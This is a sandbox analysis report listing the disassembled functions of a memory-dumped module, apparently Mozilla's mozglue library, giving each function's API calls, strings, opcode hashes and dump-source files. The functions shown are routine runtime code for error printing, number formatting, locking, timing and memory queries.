__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9B6069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9B6073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9B6082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C9D148E), ref: 6C9B6091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C95EE51,00000000,?), ref: 6C9B60BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9B60C4

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: 28e3ea173a4d4d0d8c97aa53ece90f2cb2f6a204ee213efe2298255cc15a9daa
Instruction ID: e83a61adb8faa0f129dc917e8056994ea339a756d63e53bc2920b569d8aa904c
Opcode Fuzzy Hash: 28e3ea173a4d4d0d8c97aa53ece90f2cb2f6a204ee213efe2298255cc15a9daa
Instruction Fuzzy Hash: 7A21B771A002089FDF106F29DC49A9E7BB8FF45614F108428E85AA7240CB74F599CFE2

Function 6C9B7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C9B7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C9B7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9B707E

Part of subcall function 6C9681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9681DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9B7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9B709C
LocalFree.KERNEL32(?), ref: 6C9B70AA

Strings

(null), xrefs: 6C9B706A, 6C9B7083
### ERROR: %s: %s, xrefs: 6C9B7087

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: bc37eefb503f36eb5ac3b1af3d349ee9becb18cc083f63732e519f171ed399f2
Instruction ID: 8bbf44654074e7dbf7dcf084a49bffa414ed7ad72ff5fc0ecc293ef824396237
Opcode Fuzzy Hash: bc37eefb503f36eb5ac3b1af3d349ee9becb18cc083f63732e519f171ed399f2
Instruction Fuzzy Hash: 7801F9B1A00104AFDB006BA4DC4ADAF7BBCEF49215F110425FA05B3241D631B958CBE1

Function 6C979E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C979EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C979F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C979F34
LeaveCriticalSection.KERNEL32(?), ref: 6C97A823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C97A83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C97A849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C97A8B1, 6C97A8D4, 6C97A8EF

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: 1992fc8db9c5d6bf549d8cc6b3e2b9ff6c3d94844719abb33f8d05ff3a2fe5ce
Instruction ID: 94957523199309d73732ad4787889eb1afbbd32ec043a61a8dfd12eef386b337
Opcode Fuzzy Hash: 1992fc8db9c5d6bf549d8cc6b3e2b9ff6c3d94844719abb33f8d05ff3a2fe5ce
Instruction Fuzzy Hash: 9A728C72A067118FD324CF28C540615FBE1BF89728F2AC7ADE8699B791D735E841CB90

Function 6C9A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C9A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9A2C61

Part of subcall function 6C954DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C954E5A
Part of subcall function 6C954DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C954E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9A2E2D

Part of subcall function 6C9681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9681DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C9A2E3B
expected a Time entry, xrefs: 6C9A2E36
(root), xrefs: 6C9A354F

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 2f4b00d47ced11161a18464576b0ae59356582a8569cb3b7f40a88233b8a2bc7
Instruction ID: 6db71ce32189a19d9db23119b6662487bea5f08fc53debd3939cd01c56360cc6
Opcode Fuzzy Hash: 2f4b00d47ced11161a18464576b0ae59356582a8569cb3b7f40a88233b8a2bc7
Instruction Fuzzy Hash: 9791DE70608B408FC724CF69C48469EF7F5AF99358F10491DE99A9BB91DB30D94ACB42

Function 6C97C0E0 Relevance: 11.2, APIs: 4, Strings: 2, Instructions: 728COMMON

Download Yara Rule

Strings

MOZ_CRASH(), xrefs: 6C97D4BB
0123456789abcdef, xrefs: 6C97C317

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID: 0123456789abcdef$MOZ_CRASH()
API String ID: 0-3968268099
Opcode ID: 9b54baf7104e09fcedbde55b30d1de880278b3df3c413a136cec9a5c0a028c50
Instruction ID: 7fa5edbcc070eb5be9ebbf6d174c7c1676320848f468cb43dc99319330264d18
Opcode Fuzzy Hash: 9b54baf7104e09fcedbde55b30d1de880278b3df3c413a136cec9a5c0a028c50
Instruction Fuzzy Hash: 9E52D03160A741CFD724CF18C4947AAB7E6FB8A318F24891DE8D687B81D735E845CB62

Function 6C9B9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C9B9F3D
__aulldiv.LIBCMT ref: 6C9B9F77
__aullrem.LIBCMT ref: 6C9B9F8C
__aulldiv.LIBCMT ref: 6C9BA023

Strings

-Infinity, xrefs: 6C9B9E60, 6C9B9E7B
NaN, xrefs: 6C9B9EAB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: b76de871a730613dcf8da029d4a421aae82e720044d5568e99e8c0efda96215f
Instruction ID: 69e0b2d3aed9ab1d57e28fa6ced42487e1b947cf972753edc10017776aeefe6a
Opcode Fuzzy Hash: b76de871a730613dcf8da029d4a421aae82e720044d5568e99e8c0efda96215f
Instruction Fuzzy Hash: 05C1C031E00319ABDB14CFA8C8807AFB7B6EBA5314F544529D405BBB80DB71ED49CB91

Function 6C95D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

, xrefs: 6C95DA88
9, xrefs: 6C95DE7F
0, xrefs: 6C95DC7F
@, xrefs: 6C95DAF6
8, xrefs: 6C95DC08
1, xrefs: 6C95DBDD
0, xrefs: 6C95D852
-, xrefs: 6C95D7DD

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: dc56e59d77088863452360d2aed5888cc7e59c776b7ea825caba42aeb66923ff
Instruction ID: 6a1b592dd77ba60c11ff780af698c891675854449e9cc88d832b678b1b5d30ef
Opcode Fuzzy Hash: dc56e59d77088863452360d2aed5888cc7e59c776b7ea825caba42aeb66923ff
Instruction Fuzzy Hash: 5D62DE7260D3458FD701CF18C29076ABBF6AF86318F984A4DE4D44BB95C335D9A6CB82

Function 6C969F00 Relevance: 8.5, Strings: 6, Instructions: 1039COMMON

Download Yara Rule

Strings

@, xrefs: 6C96A625
0, xrefs: 6C96A100
1, xrefs: 6C96A824
' , xrefs: 6C96A3D8
0, xrefs: 6C96AB22
9, xrefs: 6C96A5D6

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID: ' $0$0$1$9$@
API String ID: 0-2946122015
Opcode ID: f12e48f6671b2ba386f0267aa31f476d870583a1c6c4107e6d66c32b96159d37
Instruction ID: 285342c432369980256c34f893e47099f05ee16847ac6515a861495d325d71b3
Opcode Fuzzy Hash: f12e48f6671b2ba386f0267aa31f476d870583a1c6c4107e6d66c32b96159d37
Instruction Fuzzy Hash: 6182CF319093318BF710CF1BC49026EB7E6EB85758F65892AE8D547ED0DB35E885CB82

Function 6C95BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C95C1CB
__aulldiv.LIBCMT ref: 6C95C24C
__aulldiv.LIBCMT ref: 6C95C348
__aullrem.LIBCMT ref: 6C95C365
__aulldiv.LIBCMT ref: 6C95C37D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: ca564f0a8df396e03c74de320938d7a0532e7320a7295eeba397575622058f59
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 1C322632B046168FCB18DE3CC89066ABBE6AFD9310F49866DE495CB395D730ED05CB91

Function 6C9C545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C9C8A4B

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 6748e7821dcc473d6c0f55ff824bf16f35ac862823f67dc771b8f36cf46e1fb6
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: D2B1E672B0021ACFDB14CF68CC907A9B7B6EF95314F1902A9C549EB781D730E985CB92

Function 6C9C542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C9C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9C925C

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 6cd0fcc83cd549fe357bb5cf7969e5caf8bc937e41cd46092fa0c911797b1cdb
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 75B1D572F0021A8BDB14CF58CC816ADB7B6AF95314F190269C549EBB85D730E989CB92

Function 6C9C50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9C8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9C925C

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: b7d9ce138e4f5084dc90b56994151a48e0598923134e98aea57dfd13da7d3c95
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: AAA1D772B001178FDB14CF68CC807A9B7B6AF95314F1502B9C949EB785D730E999CB92

Function 6C9A77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9A7A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9A7A93

Part of subcall function 6C975C50: GetTickCount64.KERNEL32 ref: 6C975D40
Part of subcall function 6C975C50: EnterCriticalSection.KERNEL32(6C9DF688), ref: 6C975D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9A7AA1

Part of subcall function 6C975C50: __aulldiv.LIBCMT ref: 6C975DB4
Part of subcall function 6C975C50: LeaveCriticalSection.KERNEL32(6C9DF688), ref: 6C975DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C9A7B31

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 3e9d9396267b8fd6d362ffdc120275956346fa5b695858bf71cff325d5cc292f
Instruction ID: 35d63b402a5348829407a67e4b6dac3005365ed227e1c3fbdf0c17e17450f845
Opcode Fuzzy Hash: 3e9d9396267b8fd6d362ffdc120275956346fa5b695858bf71cff325d5cc292f
Instruction Fuzzy Hash: 90B1AC356087808BCB18CFA4C49165FB7E2BFD9318F154A1CE99567B94DB70E90BCB82

Function 6C996CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C996D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C996E1E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 190545fa93add6624df31b3837edecfd649328ccff8905c3ebfe861819337645
Instruction ID: f7634df291f7fc298ae2d1d3f8b29d472dd0c08a0e26eb2a7d4116a96b0aebee
Opcode Fuzzy Hash: 190545fa93add6624df31b3837edecfd649328ccff8905c3ebfe861819337645
Instruction Fuzzy Hash: 93A18D706183818FCB15CF24C4907AEFBE6BFA8308F54495DE48A87751DB70E959CB92

Function 6C9BB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C9BB720
RtlNtStatusToDosError.NTDLL ref: 6C9BB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C98FE3F,00000000,00000000,?,?,00000000,?,6C98FE3F), ref: 6C9BB760

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: cc99d34a6e496eed520c7a07b2e806247ae11e6d808a5d991b7e6fc456712b5b
Instruction ID: 973e5f119293fe9ebbc3919dc469951abb1e451a2f5b83f2ef42083c76e2a61a
Opcode Fuzzy Hash: cc99d34a6e496eed520c7a07b2e806247ae11e6d808a5d991b7e6fc456712b5b
Instruction Fuzzy Hash: 51F0AFB0A0420CAEEF019AA1CCC4BEFB7BC9B14719F105129E511729C0D774E6C8C762

Function 6C974640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C974777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C975585, 6C9755A8, 6C9755C3, 6C975624

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: b8fba4b3ede52566ec7055dcbf9c5fc672f8be9d6d9c8c173a5336a918f36b23
Instruction ID: 1fad17c29fd2c955e96db0ffb6502fe17ff21090745f4a1ef674bff60e20a197
Opcode Fuzzy Hash: b8fba4b3ede52566ec7055dcbf9c5fc672f8be9d6d9c8c173a5336a918f36b23
Instruction Fuzzy Hash: 37B28D71A06B018FD728CF18C590715BBE6BFC5324B29C7ADE4698B6A6D731E841CF90

Function 6C9B85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C9B8C7C
__aulldiv.LIBCMT ref: 6C9B8DD7

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: abf186ce9f9c734c8e384b0231a2bea45213bc7c3d19e44ecba271efc7597e0d
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: DB325971F0121A8BDF1CCE9CC8A17BEB7B6FB88300F15852AD506BB790DA349D458B95

Function 6C9BB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C9603D4,?), ref: 6C9BB955
NtQueryVirtualMemory.NTDLL ref: 6C9BB9A5

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: d077d2515b652df3e93b97476cfbe80de89b3795a0deb1f8ba932ea9462c6a7e
